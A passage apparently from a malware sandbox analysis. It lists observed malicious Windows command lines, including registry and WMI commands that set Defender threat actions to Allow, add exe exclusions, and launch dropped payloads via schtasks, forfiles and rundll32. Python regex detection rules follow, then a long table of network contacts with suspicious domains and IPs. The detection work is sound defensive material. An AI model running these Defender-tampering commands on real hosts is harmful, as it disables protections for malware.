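    r'/TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe\" 0c /PspKdidaZ 385118 /S" /V1 /F',
    r'forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add '
    r'\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"',
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6',
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True',
    r'C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118',
    r'ping -n 5 127.0.0.1',
]

# ThreatIDDefaultAction data 6 is the "Allow" action for that threat ID.
RE_THREAT_ALLOW = re.compile(r"ThreatIDDefaultAction.*?/d\s+6\b", re.I)
# MSFT_MpPreference "call Add Exclusion..." adds a Defender exclusion via WMI.
RE_EXCLUSION_ADD = re.compile(r"MSFT_MpPreference\s+call\s+Add\s+Exclusion", re.I)
# forfiles /c runs its argument once per matched file: an execution proxy.
RE_FORFILES = re.compile(r'(?:^|[\s\\"])forfiles(?:\.exe)?"?\s', re.I)
RE_PROXY_CMD = re.compile(r"\s/c\s", re.I)
# schtasks /CREATE ... /RU SYSTEM with an action under Temp/AppData/ProgramData.
RE_SCHTASKS_CREATE = re.compile(r'\bschtasks(?:\.exe)?"?\s+/CREATE\b', re.I)
RE_RUN_AS_SYSTEM = re.compile(r'/RU\s+"?SYSTEM"?', re.I)
RE_USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|ProgramData)\\", re.I)
# findstr over tasklist output looking for security-product process names.
RE_AV_PROBE = re.compile(
    r'^\s*findstr\s+/I\s+"[^"]*(?:avastui|avgui|wrsa|opssvc|sophoshealth|nswscsvc)\.exe', re.I)
# rundll32 invoking a DLL export by ordinal (",#1").
RE_RUNDLL_ORDINAL = re.compile(r'rundll32(?:\.exe)?\s+"?[^"]+\.dll"?,#\d+', re.I)

RULES = [
    ("defender_threat_allow", lambda c: bool(RE_THREAT_ALLOW.search(c))),
    ("defender_exclusion_add", lambda c: bool(RE_EXCLUSION_ADD.search(c))),
    ("forfiles_proxy_exec", lambda c: bool(RE_FORFILES.search(c) and RE_PROXY_CMD.search(c))),
    ("schtasks_system_writable_path", lambda c: bool(
        RE_SCHTASKS_CREATE.search(c) and RE_RUN_AS_SYSTEM.search(c) and RE_USER_WRITABLE.search(c))),
    ("av_process_probe", lambda c: bool(RE_AV_PROBE.search(c))),
    ("rundll32_ordinal_export", lambda c: bool(RE_RUNDLL_ORDINAL.search(c))),
]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, pred in RULES if pred(cmdline)]


def triage(cmdlines):
    """Return ([(cmdline, tags)], Counter of tag names) for a list of lines."""
    hits = [(c, classify(c)) for c in cmdlines]
    counts = Counter(t for _, tags in hits for t in tags)
    return hits, counts


if __name__ == "__main__":
    hits, counts = triage(SAMPLE_CMDLINES)
    for cmd, tags in hits:
        if tags:
            print(", ".join(tags), "<-", cmd[:90])
    print(dict(counts))
```

The rules deliberately key on the invariant parts of each pattern (the registry path and action value, the WMI class and method, the proxy binary plus `/c`) rather than on the random task names and drop paths, which change from sample to sample. On a live host the same regexes can be applied to Sysmon event 1 or Security 4688 command-line fields.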
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | filescan.io | udp |
| US | 172.67.70.67:443 | filescan.io | tcp |
| US | 172.67.70.67:443 | filescan.io | tcp |
| US | 8.8.8.8:53 | www.filescan.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.26.14.230:443 | www.filescan.io | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 67.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.14.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn-cookieyes.com | udp |
| US | 104.26.14.230:443 | www.filescan.io | udp |
| US | 104.22.58.91:443 | cdn-cookieyes.com | tcp |
| US | 8.8.8.8:53 | log.cookieyes.com | udp |
| IE | 52.31.17.134:443 | log.cookieyes.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 104.22.58.91:443 | cdn-cookieyes.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | platform.twitter.com | udp |
| GB | 172.217.169.74:443 | content-autofill.googleapis.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.58.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.17.31.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.233.229.192.in-addr.arpa | udp |
| GB | 172.217.169.74:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | syndication.twitter.com | udp |
| US | 104.244.42.200:443 | syndication.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| US | 8.8.8.8:53 | 200.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | directory.cookieyes.com | udp |
| IE | 52.210.197.119:443 | directory.cookieyes.com | tcp |
| US | 8.8.8.8:53 | 119.197.210.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| CN | 124.71.81.174:80 | | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f.123654987.xyz | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| US | 8.8.8.8:53 | 118.194.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.66.42.5.in-addr.arpa | udp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| RU | 88.212.252.98:443 | softcatalog.ru | tcp |
| US | 8.8.8.8:53 | 172.127.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| US | 8.8.8.8:53 | 98.252.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.42.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.174.76.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.29.52.in-addr.arpa | udp |
| SG | 118.194.235.187:50500 | | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| MD | 94.103.188.126:80 | 94.103.188.126 | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | 126.188.103.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.235.194.118.in-addr.arpa | udp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| GB | 99.86.249.221:80 | sd.p.360safe.com | tcp |
| US | 8.8.8.8:53 | 17.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.249.86.99.in-addr.arpa | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | 57.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | pepecasas123.net | udp |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| US | 8.8.8.8:53 | 90.205.10.195.in-addr.arpa | udp |
| DE | 49.13.194.118:53848 | | tcp |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| NL | 185.73.125.6:80 | 185.73.125.6 | tcp |
| US | 8.8.8.8:53 | 6.125.73.185.in-addr.arpa | udp |
| CN | 119.91.25.19:8888 | | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| SG | 118.194.235.187:50500 | | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| RU | 91.215.85.135:80 | 91.215.85.135 | tcp |
| US | 8.8.8.8:53 | 135.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.192.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | files2.tech | udp |
| SG | 118.194.235.187:50500 | | tcp |
| N/A | 10.127.0.1:445 | | tcp |
| N/A | 10.127.0.1:139 | | tcp |
| DE | 77.91.77.33:80 | 77.91.77.33 | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| US | 8.8.8.8:53 | 33.77.91.77.in-addr.arpa | udp |
| EE | 45.129.96.86:80 | 45.129.96.86 | tcp |
| US | 8.8.8.8:53 | 86.96.129.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doggie-services.com | udp |
| US | 8.8.8.8:53 | fragmentyperspowp.shop | udp |
| US | 104.21.20.181:443 | fragmentyperspowp.shop | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| FR | 5.42.67.23:80 | doggie-services.com | tcp |
| US | 8.8.8.8:53 | 181.20.21.104.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | horsedwollfedrwos.shop | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 104.21.74.118:443 | horsedwollfedrwos.shop | tcp |
| US | 8.8.8.8:53 | 23.67.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | patternapplauderw.shop | udp |
| US | 172.67.174.208:443 | patternapplauderw.shop | tcp |
| US | 8.8.8.8:53 | 118.74.21.104.in-addr.arpa | udp |
| N/A | 10.127.0.1:135 | | tcp |
| US | 8.8.8.8:53 | understanndtytonyguw.shop | udp |
| RU | 195.2.70.38:30001 | 195.2.70.38 | tcp |
| US | 172.67.203.201:443 | understanndtytonyguw.shop | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 208.174.67.172.in-addr.arpa | udp |
| RU | 94.103.90.9:25349 | | tcp |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 38.70.2.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | considerrycurrentyws.shop | udp |
| US | 172.67.170.57:443 | considerrycurrentyws.shop | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 9.90.103.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.170.67.172.in-addr.arpa | udp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | messtimetabledkolvk.shop | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 104.21.8.238:443 | messtimetabledkolvk.shop | tcp |
| DE | 185.172.128.69:80 | 185.172.128.69 | tcp |
| US | 8.8.8.8:53 | detailbaconroollyws.shop | udp |
| US | 8.8.8.8:53 | 238.8.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.128.172.185.in-addr.arpa | udp |
| US | 172.67.193.11:443 | detailbaconroollyws.shop | tcp |
| US | 8.8.8.8:53 | 11.193.67.172.in-addr.arpa | udp |
| DE | 185.172.128.69:80 | 185.172.128.69 | tcp |
| US | 8.8.8.8:53 | deprivedrinkyfaiir.shop | udp |
| US | 172.67.134.244:443 | deprivedrinkyfaiir.shop | tcp |
| US | 8.8.8.8:53 | relaxtionflouwerwi.shop | udp |
| US | 8.8.8.8:53 | 244.134.67.172.in-addr.arpa | udp |
| US | 172.67.190.237:443 | relaxtionflouwerwi.shop | tcp |
| US | 8.8.8.8:53 | 237.190.67.172.in-addr.arpa | udp |
| KR | 43.155.163.53:24543 | | tcp |
| RU | 147.45.47.155:80 | 147.45.47.155 | tcp |
| US | 8.8.8.8:53 | 53.163.155.43.in-addr.arpa | udp |
| N/A | 10.127.0.1:135 | | tcp |
| KR | 43.155.163.53:24543 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 8.8.8.8:53 | roomabolishsnifftwk.shop | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.55.87:443 | roomabolishsnifftwk.shop | tcp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| DE | 185.172.128.82:80 | 185.172.128.82 | tcp |
| US | 8.8.8.8:53 | gigapub.ma | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| FR | 51.75.247.100:443 | gigapub.ma | tcp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | 87.55.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.247.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | museumtespaceorsp.shop | udp |
| US | 104.21.32.80:443 | museumtespaceorsp.shop | tcp |
| US | 8.8.8.8:53 | 80.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | buttockdecarderwiso.shop | udp |
| US | 172.67.218.187:443 | buttockdecarderwiso.shop | tcp |
| US | 8.8.8.8:53 | 187.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | averageaattractiionsl.shop | udp |
| US | 172.67.220.163:443 | averageaattractiionsl.shop | tcp |
| KR | 43.155.163.53:24543 | | tcp |
| US | 8.8.8.8:53 | 163.220.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | femininiespywageg.shop | udp |
| US | 104.21.71.3:443 | femininiespywageg.shop | tcp |
| US | 8.8.8.8:53 | employhabragaomlsp.shop | udp |
| US | 8.8.8.8:53 | 3.71.21.104.in-addr.arpa | udp |
| US | 104.21.85.81:443 | employhabragaomlsp.shop | tcp |
| US | 8.8.8.8:53 | stalfbaclcalorieeis.shop | udp |
| US | 8.8.8.8:53 | 81.85.21.104.in-addr.arpa | udp |
| US | 104.21.3.197:443 | stalfbaclcalorieeis.shop | tcp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | 197.3.21.104.in-addr.arpa | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| N/A | 10.127.0.1:445 | | tcp |
| US | 8.8.8.8:53 | civilianurinedtsraov.shop | udp |
| US | 172.67.197.146:443 | civilianurinedtsraov.shop | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| N/A | 10.127.0.1:139 | | tcp |
| US | 8.8.8.8:53 | 146.197.67.172.in-addr.arpa | udp |
| GB | 85.192.56.26:80 | 85.192.56.26 | tcp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 26.56.192.85.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | 163.75.67.172.in-addr.arpa | udp |
| RU | 147.45.47.126:58709 | | tcp |
| US | 8.8.8.8:53 | 126.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| GB | 85.192.56.26:80 | 85.192.56.26 | tcp |
| DE | 185.172.128.69:80 | 185.172.128.69 | tcp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| TM | 91.202.233.232:80 | 91.202.233.232 | tcp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| DE | 185.172.128.159:80 | 185.172.128.159 | tcp |
| US | 8.8.8.8:53 | lop.foxesjoy.com | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| BG | 94.232.45.38:80 | 94.232.45.38 | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 172.67.159.232:80 | lop.foxesjoy.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| US | 172.67.159.232:80 | lop.foxesjoy.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 10.66.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.45.232.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.233.202.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.225.186.93.in-addr.arpa | udp |
| US | 172.67.159.232:80 | lop.foxesjoy.com | tcp |
| US | 172.67.159.232:443 | lop.foxesjoy.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| GB | 172.217.16.238:443 | www.youtube.com | tcp |
| GB | 172.217.16.238:443 | www.youtube.com | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:80 | raw.githubusercontent.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 232.159.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:80 | vk.com | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| DE | 136.243.76.170:445 | | tcp |
| DE | 136.243.76.170:139 | | tcp |
| US | 8.8.8.8:53 | f.123654987.xyz | udp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-21.userapi.com | udp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| US | 8.8.8.8:53 | 170.101.63.23.in-addr.arpa | udp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-22.userapi.com | udp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| RU | 93.186.225.194:443 | vk.com | tcp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| US | 8.8.8.8:53 | 2.206.142.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.206.142.95.in-addr.arpa | udp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| RU | 185.215.113.67:40960 | | tcp |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | 19.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | detailbaconroollyws.shop | udp |
| US | 172.67.193.11:443 | detailbaconroollyws.shop | tcp |
| US | 8.8.8.8:53 | horsedwollfedrwos.shop | udp |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| US | 104.21.74.118:443 | horsedwollfedrwos.shop | tcp |
| DE | 136.243.76.170:135 | | tcp |
| US | 8.8.8.8:53 | patternapplauderw.shop | udp |
| US | 104.21.55.248:443 | patternapplauderw.shop | tcp |
| US | 8.8.8.8:53 | 222.49.143.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.55.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | understanndtytonyguw.shop | udp |
| US | 104.21.22.94:443 | understanndtytonyguw.shop | tcp |
| US | 8.8.8.8:53 | 94.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | considerrycurrentyws.shop | udp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 104.21.28.32:443 | considerrycurrentyws.shop | tcp |
| US | 8.8.8.8:53 | 32.28.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| US | 8.8.8.8:53 | messtimetabledkolvk.shop | udp |
| RU | 5.42.65.116:50500 | | tcp |
| US | 172.67.158.30:443 | messtimetabledkolvk.shop | tcp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | 116.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.158.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deprivedrinkyfaiir.shop | udp |
| US | 104.21.25.251:443 | deprivedrinkyfaiir.shop | tcp |
| US | 8.8.8.8:53 | 251.25.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | relaxtionflouwerwi.shop | udp |
| US | 172.67.190.237:443 | relaxtionflouwerwi.shop | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ocsp.crlocsp.cn | udp |
| CN | 101.198.2.196:80 | ocsp.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | lubriaceites.com | udp |
| US | 212.1.210.79:443 | lubriaceites.com | tcp |
